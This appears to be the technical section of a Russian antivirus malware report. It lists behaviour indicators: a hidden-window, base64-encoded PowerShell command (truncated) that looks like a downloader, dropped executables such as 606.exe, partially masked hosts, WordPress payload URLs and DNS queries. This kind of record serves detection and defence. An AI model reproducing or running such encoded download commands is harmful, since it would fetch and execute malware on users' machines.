Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABoAGkAcgB5AG8AbwBsAHEAdQBhAGQAPQAnAG4AbwBvAGcAcAB1AGEAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAUgBgAGkAdAB5AFAAUgBgAE8AdABvAGMAYABPAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1996
- %TEMP%\1085642.cvr
- %HOMEPATH%\606.exe
- %HOMEPATH%\606.exe
- %HOMEPATH%\606.exe
- 'ch#####svideobar.com':80
- 'bu###ngems.com':443
- 'xi###aji.com':80
- 'dn####.qcloud.com':443
- 'co####anytime.com':80
- 'co####anytime.com':443
- http://ch#####svideobar.com/blogs/w0x0lEZ/
- http://xi###aji.com/wp-includes/ID3/DeQFPrxR/
- http://www.co####anytime.com/wp-content/uploads/DZIizOT/
- 'bu###ngems.com':443
- 'dn####.qcloud.com':443
- 'co####anytime.com':443
- DNS ASK ch#####svideobar.com
- DNS ASK pa###.####tegicwebmarketingmd.com
- DNS ASK bu###ngems.com
- DNS ASK xi###aji.com
- DNS ASK dn####.qcloud.com
- DNS ASK co####anytime.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABoAGkAcgB5AG8AbwBsAHEAdQBhAGQAPQAnAG4AbwBvAGcAcAB1AGEAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAUgBgAGkAdAB5AFAAUgBgAE8AdABvAGMAYABPAG...' (со скрытым окном)